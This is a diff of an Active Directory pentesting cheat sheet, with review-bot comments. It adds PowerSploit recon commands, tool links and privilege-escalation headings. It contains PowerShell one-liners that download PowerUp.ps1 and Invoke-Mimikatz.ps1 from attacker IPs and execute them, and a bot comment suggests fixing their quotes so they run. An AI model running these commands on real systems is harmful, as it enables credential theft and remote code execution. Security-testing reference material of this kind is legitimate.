AD - Little fixes and refactor

Swissky 2018-04-28 19:54:32 +02:00
parent cb3b298451
commit 2dcffadd46


@ -33,6 +33,12 @@
List all GPO for a domain : List all GPO for a domain :
Get-GPO -domaine DOMAIN.COM -all Get-GPO -domaine DOMAIN.COM -all
Get-GPOReport -all -reporttype xml --all Get-GPOReport -all -reporttype xml --all
or
Powersploit:
Get-NetGPO
Get-NetGPOGroup
``` ```
* Dangerous Built-in Groups Usage * Dangerous Built-in Groups Usage
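Review bot: the two GroupPolicy commands in this hunk's context still carry typos that the refactor leaves in place: `Get-GPO -domaine DOMAIN.COM -all` should read `Get-GPO -Domain DOMAIN.COM -All` (the parameter is `-Domain`), and `Get-GPOReport -all -reporttype xml --all` has a doubled, GNU-style `--all` that PowerShell will reject, so it should be `Get-GPOReport -All -ReportType Xml`. Since the hunk already edits this fenced block, fix them here. Minor: the added `Powersploit:` label is spelled `PowerSploit` in the Tools list further down; keep one spelling.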
@ -99,22 +105,21 @@
## Tools ## Tools
* [Impacket](https://github.com/CoreSecurity/impacket) * [Impacket](https://github.com/CoreSecurity/impacket)
* Responder * [Responder](https://github.com/SpiderLabs/Responder)
* Mimikatz * [Mimikatz](https://github.com/gentilkiwi/mimikatz)
* [Ranger](https://github.com/funkandwagnalls/ranger) * [Ranger](https://github.com/funkandwagnalls/ranger)
* BloodHound * [BloodHound](https://github.com/BloodHoundAD/BloodHound)
* RottenPotato
* [AdExplorer](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer) * [AdExplorer](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer)
* [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec)
## PowerSploit * [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon)
``` ```
https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon powershell.exe -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks”
powershell.exe -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks” powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');"
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');" ```
```
## PrivEsc - Token Impersonation (RottenPotato) ## Privilege Escalation
### PrivEsc - Token Impersonation (RottenPotato)
Binary available at : https://github.com/foxglovesec/RottenPotato Binary available at : https://github.com/foxglovesec/RottenPotato
Binary available at : https://github.com/breenmachine/RottenPotatoNG Binary available at : https://github.com/breenmachine/RottenPotatoNG
```c ```c
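Review bot: the first one-liner moved into the new fenced block, `powershell.exe -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks”`, still wraps the `-c` argument in curly quotes “ ”, so it fails as soon as someone pastes it, while the Invoke-Mimikatz line directly below uses straight quotes; replace them with straight `"` here. Separately, the new PowerSploit bullet links only to the `tree/master/Recon` subtree, yet the two commands under it pull `PowerUp.ps1` and `Invoke-Mimikatz.ps1`, which are privilege-escalation and credential-dumping scripts rather than recon; point the link at the repository root so the bullet matches what the examples use. Removing `RottenPotato` from the Tools list is fine, since the new `### PrivEsc - Token Impersonation (RottenPotato)` subsection keeps both binary links.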
@ -134,7 +139,7 @@ Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -n
``` ```
## PrivEsc - MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) ### PrivEsc - MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)
``` ```
Powershell: Powershell:
https://www.exploit-db.com/exploits/39719/ https://www.exploit-db.com/exploits/39719/
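Review bot: demoting this heading to `###` is consistent with the `## Privilege Escalation` parent introduced in the previous hunk, but the fenced block under it wraps a `Powershell:` label and an exploit-db URL rather than a command; for consistency with the linked bullets in the Tools list, present the URL as a markdown link bullet and reserve code fences for runnable commands.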